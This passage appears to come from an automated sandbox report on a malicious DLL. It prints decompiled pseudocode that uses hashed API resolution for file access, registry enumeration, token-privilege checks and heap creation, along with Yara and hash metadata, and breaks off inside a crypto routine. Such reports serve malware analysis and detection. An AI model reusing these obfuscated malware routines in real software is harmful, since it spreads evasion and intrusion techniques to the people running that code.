					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E9B3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E9B3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}














                                                                                                                                                  0x6e9b5bb3
                                                                                                                                                  0x6e9b5bba
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x6e9b5cc6
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                                                                  • Instruction ID: 833d13a2fd19232a52afc2d24a2860e6464b801a46ba4dc4c316f1fb3fcef2f8
                                                                                                                                                  • Opcode Fuzzy Hash: fd453b4d94b8717904924a4bfaa5cf84b2704d2f9b2ed6019faa6721121f1a3e
                                                                                                                                                  • Instruction Fuzzy Hash: 4E01243168020ABBFB91AAF58C45FBB724FCFD2658F004835BA01A5189DE32E854CA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5C01, Relevance: 1.6, APIs: 1, Instructions: 59fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 48%
                                                                                                                                                  			E6E9B5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E9B3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E9AC26C(_t23);
				if(E6E9AC280(_t23) != 0) {
					_t31[2] = E6E9B35F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E9B3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E9B3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E9B3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}














                                                                                                                                                  0x6e9b5c01
                                                                                                                                                  0x6e9b5c05
                                                                                                                                                  0x6e9b5c09
                                                                                                                                                  0x6e9b5c12
                                                                                                                                                  0x6e9b5c18
                                                                                                                                                  0x6e9b5c19
                                                                                                                                                  0x6e9b5c0b
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c0d
                                                                                                                                                  0x6e9b5c2f
                                                                                                                                                  0x6e9b5c43
                                                                                                                                                  0x6e9b5c31
                                                                                                                                                  0x6e9b5c3e
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c40
                                                                                                                                                  0x6e9b5c45
                                                                                                                                                  0x6e9b5c4a
                                                                                                                                                  0x6e9b5c58
                                                                                                                                                  0x6e9b5cc3
                                                                                                                                                  0x6e9b5cc6
                                                                                                                                                  0x6e9b5c5a
                                                                                                                                                  0x6e9b5c5f
                                                                                                                                                  0x6e9b5cac
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cba
                                                                                                                                                  0x6e9b5cb0
                                                                                                                                                  0x6e9b5c61
                                                                                                                                                  0x6e9b5c6d
                                                                                                                                                  0x6e9b5c72
                                                                                                                                                  0x6e9b5c86
                                                                                                                                                  0x6e9b5c88
                                                                                                                                                  0x6e9b5c89
                                                                                                                                                  0x6e9b5c8a
                                                                                                                                                  0x6e9b5c8c
                                                                                                                                                  0x6e9b5c8e
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c8f
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c92
                                                                                                                                                  0x6e9b5c9a

                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E9B5C3E
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                  • Opcode ID: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                                                                  • Instruction ID: 377f85a3642e923c85f31de81d8b51cde2a7ff5c10d16d1bb5c8527f79bfb585
                                                                                                                                                  • Opcode Fuzzy Hash: 58b5aa14198def0d92bf4b4c46dd0558d7dd4de209147f86e2b3c819d4d50927
                                                                                                                                                  • Instruction Fuzzy Hash: 78012B3568020ABBF79166F58D45F7B774FDFD1658F004C35BA01A5189DF32E954CA20
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5E10, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 63%
                                                                                                                                                  			E6E9B5E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E9AC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E9B3064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}









                                                                                                                                                  0x6e9b5e14
                                                                                                                                                  0x6e9b5e15
                                                                                                                                                  0x6e9b5e17
                                                                                                                                                  0x6e9b5e1d
                                                                                                                                                  0x6e9b5e1f
                                                                                                                                                  0x6e9b5e23
                                                                                                                                                  0x6e9b5e23
                                                                                                                                                  0x6e9b5e27
                                                                                                                                                  0x6e9b5e33
                                                                                                                                                  0x6e9b5e67
                                                                                                                                                  0x6e9b5e67
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5e35
                                                                                                                                                  0x6e9b5e3a
                                                                                                                                                  0x6e9b5e3b
                                                                                                                                                  0x6e9b5e4f
                                                                                                                                                  0x6e9b5e60
                                                                                                                                                  0x6e9b5e51
                                                                                                                                                  0x6e9b5e5c
                                                                                                                                                  0x6e9b5e5c
                                                                                                                                                  0x6e9b5e65
                                                                                                                                                  0x6e9b5e6d
                                                                                                                                                  0x6e9b5e6f
                                                                                                                                                  0x6e9b5e72
                                                                                                                                                  0x6e9b5e77
                                                                                                                                                  0x6e9b5e77
                                                                                                                                                  0x6e9b5e7b
                                                                                                                                                  0x6e9b5e80
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5e65

                                                                                                                                                  APIs
                                                                                                                                                  • SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E9B5D48,?,?), ref: 6E9B5E5C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FilePointer
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 973152223-0
                                                                                                                                                  • Opcode ID: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                                                                  • Instruction ID: da2188df69a8210c59f5ec810ad2196fbc7b34e13a30c44c18edab186f4a0819
                                                                                                                                                  • Opcode Fuzzy Hash: 81883a7f7b798860578a1a75a64f6229bbff1743631c676b12ff8142a5686874
                                                                                                                                                  • Instruction Fuzzy Hash: 95F07D31A08B117AD75159BCDC40B8773EEDFD1750F104F29F640E7154E770D4408A60
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B5E84, Relevance: 1.5, APIs: 1, Instructions: 45fileCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B5E84(void* __ecx, void* __eflags, void* _a4, long _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E6E9AC280(_t19) == 0) {
					_v12 = _a8;
					if(E6E9B3064(0x8e844d1e, 0xed3ed1cc) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E6E9B35F0(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}











                                                                                                                                                  0x6e9b5e87
                                                                                                                                                  0x6e9b5e89
                                                                                                                                                  0x6e9b5e95
                                                                                                                                                  0x6e9b5e9f
                                                                                                                                                  0x6e9b5eb5
                                                                                                                                                  0x6e9b5ed4
                                                                                                                                                  0x6e9b5eb7
                                                                                                                                                  0x6e9b5ec8
                                                                                                                                                  0x6e9b5ecc
                                                                                                                                                  0x6e9b5eec
                                                                                                                                                  0x6e9b5ece
                                                                                                                                                  0x6e9b5ece
                                                                                                                                                  0x6e9b5ece
                                                                                                                                                  0x6e9b5ecc
                                                                                                                                                  0x6e9b5ed5
                                                                                                                                                  0x6e9b5eda
                                                                                                                                                  0x6e9b5ee3
                                                                                                                                                  0x6e9b5edc
                                                                                                                                                  0x6e9b5edc
                                                                                                                                                  0x6e9b5ede
                                                                                                                                                  0x6e9b5ede
                                                                                                                                                  0x6e9b5e97
                                                                                                                                                  0x6e9b5e97
                                                                                                                                                  0x6e9b5e97
                                                                                                                                                  0x6e9b5ee9

                                                                                                                                                  APIs
                                                                                                                                                  • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,8E844D1E,ED3ED1CC,?,?,?,6E9B5D79,00000000,?,00000000,?), ref: 6E9B5EC8
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileRead
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2738559852-0
                                                                                                                                                  • Opcode ID: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                                                                  • Instruction ID: 057a33c6af43675f8d4cd4d2a1aaa17d24b1c278cc22027227aaa86a8df8e77c
                                                                                                                                                  • Opcode Fuzzy Hash: c0cf3570fa8a4b5164650021c2e4412c76cd4a4c2dd5e69b9ffce37a9129dcb0
                                                                                                                                                  • Instruction Fuzzy Hash: 6CF04931258307FFD791DEB9DC10AAB77DAAF55254F108C29A995C6140EB32D405CF21
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B564C, Relevance: 1.5, APIs: 1, Instructions: 45registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E6E9B564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E9B3064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E9AE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}









                                                                                                                                                  0x6e9b5656
                                                                                                                                                  0x6e9b5658
                                                                                                                                                  0x6e9b565f
                                                                                                                                                  0x6e9b5661
                                                                                                                                                  0x6e9b5665
                                                                                                                                                  0x6e9b5667
                                                                                                                                                  0x6e9b566a
                                                                                                                                                  0x6e9b566d
                                                                                                                                                  0x6e9b566d
                                                                                                                                                  0x6e9b5687
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b5698
                                                                                                                                                  0x6e9b569c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b56aa
                                                                                                                                                  0x6e9b56ad
                                                                                                                                                  0x6e9b56b2
                                                                                                                                                  0x6e9b56b7
                                                                                                                                                  0x6e9b56b7

                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E9B5698
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumValue
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2814608202-0
                                                                                                                                                  • Opcode ID: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                                                                  • Instruction ID: 664e9dd3cb011324cfcde55bfb25b0b25b6cdd1bf5d79f9b68a7270234ba3e7f
                                                                                                                                                  • Opcode Fuzzy Hash: ce57060c0c74c73790e298699b79442642d4b62f4a997544e107782f72be450e
                                                                                                                                                  • Instruction Fuzzy Hash: 64F0AFB520030AABE7249E5ACC54DBBBBEDEFC1B50F00892DA0D542200EA31EC5089B0
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B1030, Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E6E9B1030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E9B306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E9B306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}









                                                                                                                                                  0x6e9b103e
                                                                                                                                                  0x6e9b1040
                                                                                                                                                  0x6e9b104e
                                                                                                                                                  0x6e9b1052
                                                                                                                                                  0x6e9b109b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b109b
                                                                                                                                                  0x6e9b1057
                                                                                                                                                  0x6e9b1058
                                                                                                                                                  0x6e9b105a
                                                                                                                                                  0x6e9b105f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1078
                                                                                                                                                  0x6e9b107c
                                                                                                                                                  0x6e9b1089
                                                                                                                                                  0x6e9b108d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b1096

                                                                                                                                                  APIs
                                                                                                                                                  • GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E9B1089
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                  • Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                                                                  • Instruction ID: 7b00b57ef8b13ec93b375f382686ea571cb6fd117fd5040d11794260c4935d16
                                                                                                                                                  • Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
                                                                                                                                                  • Instruction Fuzzy Hash: 06F06DB0B44683ABFA40D5BD9C68F7F32ED5FC2654F508838B540CA194EF78C9498A26
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6E9B3628, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 29%
                                                                                                                                                  			E6E9B3628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e9bd228 == 0xa33c83e5) {
					_t7 = E6E9B3064(0x60a28c5c, 0x1c6ef387);
					 *0x6e9bd22c = E6E9B3064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e9bd228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e9bd228 = 0;
					}
				}
				_t3 = E6E9B3064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e9bd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}






                                                                                                                                                  0x6e9b3630
                                                                                                                                                  0x6e9b3638
                                                                                                                                                  0x6e9b366b
                                                                                                                                                  0x6e9b367c
                                                                                                                                                  0x6e9b3687
                                                                                                                                                  0x6e9b3692
                                                                                                                                                  0x6e9b3694
                                                                                                                                                  0x6e9b3694
                                                                                                                                                  0x6e9b3687
                                                                                                                                                  0x6e9b3644
                                                                                                                                                  0x6e9b364b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b364d
                                                                                                                                                  0x6e9b364d
                                                                                                                                                  0x6e9b364e
                                                                                                                                                  0x6e9b3650
                                                                                                                                                  0x6e9b3652
                                                                                                                                                  0x6e9b3653
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6e9b3653

                                                                                                                                                  APIs
                                                                                                                                                  • RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E9ADE09,?,?), ref: 6E9B3692
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.685190249.000000006E9A1000.00000020.00020000.sdmp, Offset: 6E9A0000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.685164563.000000006E9A0000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685274294.000000006E9BA000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685296966.000000006E9BD000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000001.00000002.685311272.000000006E9BF000.00000002.00020000.sdmp Download File
                                                                                                                                                  Yara matches
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 10892065-0
                                                                                                                                                  • Opcode ID: 552daa9a0349565eb8ba516fa66b446886e76ea57532c112228795d3609a1eb2
                                                                                                                                                  • Instruction ID: 08ba49f895f8164c3c916ec293dea71e76b29e94dc4d771bb941838149c6118c
                                                                                                                                                  • Opcode Fuzzy Hash: 552daa9a0349565eb8ba516fa66b446886e76ea57532c112228795d3609a1eb2
                                                                                                                                                  • Instruction Fuzzy Hash: F4F02464156284FFEA60CDFAAC09C53929CEFA1245B000C38F280E1200D6F0C440CE31
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Non-executed Functions

                                                                                                                                                  Function 6E9A1494, Relevance: 1.9, Strings: 1, Instructions: 613COMMONCrypto
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 31%
                                                                                                                                                  			E6E9A1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E9AF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v76, E6E9AF4CC( &_v76) + 0x10);
				E6E9AF4BC( &_v80, E6E9AF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v84, E6E9AF4CC(_t325) + 0x10);
				E6E9AF4BC( &_v88, E6E9AF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v92, E6E9AF4CC(_t329) + 0x10);
				E6E9AF4BC( &_v96, E6E9AF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v100, E6E9AF4CC(_t333) + 0x10);
				E6E9AF4BC( &_v104, E6E9AF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E9AF828( &_v108, E6E9AF4CC(_t337) + 0x10);
				E6E9AF4BC( &_v112, E6E9AF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
